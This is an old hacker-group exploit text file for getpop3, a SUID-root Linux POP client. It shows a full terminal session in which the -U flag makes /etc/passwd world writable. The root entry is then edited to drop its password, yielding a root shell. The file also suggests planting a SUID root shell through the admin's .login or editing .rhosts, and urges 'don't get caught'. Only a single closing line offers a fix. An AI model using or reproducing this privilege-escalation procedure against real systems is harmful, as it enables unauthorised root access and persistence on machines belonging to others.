######################################## #what?: [=-getpop3 exploit-=] # #who?: [- by r3p3nt of the DHC -] # #where?: [- http://dhc1.cjb.net -] # #contact?: [- tdefiance@hotmail.com # ######################################## greets: all of DHC, duke, f0rpaxe, artech, and eli (up for some raceball?) thanks: jwb tdefiance@hotmail.com You are wondering "hmm..what is getpop3, mister r3p3nt". Well, getpop3 is a POP mail client for linux (no, not that stuff in Chex mix). This exploit has been known by me for a very long time..so I might as well release it now. This exploit was found when someone (he will go unnamed because I don't want Joel to look like a fool) said his linux box was 'secure, no one can hack it'. After some fumbling around on his box...root access was obtained. The hole? Getpop3. Getpop3 is installed SUID root. If you dont know what SUID root is..don't use this exploit@!$ When getpop3 is fed the -U parameter it sets a file world writable. If you are a goon..here is how this could be good: lamebox:~$ id uid=1000(elf) gid=100(users) groups=100(users) lamebox:~$ cp /etc/passwd /tmp/backup lamebox:~$ getpop3 -V getpop3 1.08 Copyright 1997 Double Precision, Inc. lamebox:~$ getpop3 -U /etc/passwd enter userid: elf enter password: mypassword enter host:poopy.reallame666.com querying poopy.reallame666.com +OK poopy.reallame666.com POP3 server (Netscape Mail Server v2.02) ready Fri, 1 >USER elf +OK Password required for elf >PASS password +OK elf's mailbox has 0 messages (0 octets) >STAT +OK 0 0 >QUIT +OK poopy.reallame666.com POP3 server closing connection ************************************************************* Whoo hooo! Now /etc/passwd is world writable..the fun begins* Remember the file we backed up? * ************************************************************* lamebox:~$ cat /tmp/backup > /etc/passwd *********************************************************************** now edit the passwd file so you are 0:0 ...like so: * root:x:0:0:super admin,,,:/root:/bin/bash <-- whats in the /etc/passwd* root::0:0:your daddy,,,:/root/:bin/bash <-- what you change it to * Now log on as root!@# * If you didn't fuck anything up you should be dropped to a root shell, * and not asked for a password. * Don't wanna overwrite /etc/passwd? Then use .rhosts .Hell, you could * even edit the admins .login ...and make it so when the logs in he/she * tosses an SUID root shell in /tmp * Be creative in what you do, and don't get caught! * *********************************************************************** *************FIX********************************************* * I havn't noticed the hole in the newer versions. Upgrade. * *************************************************************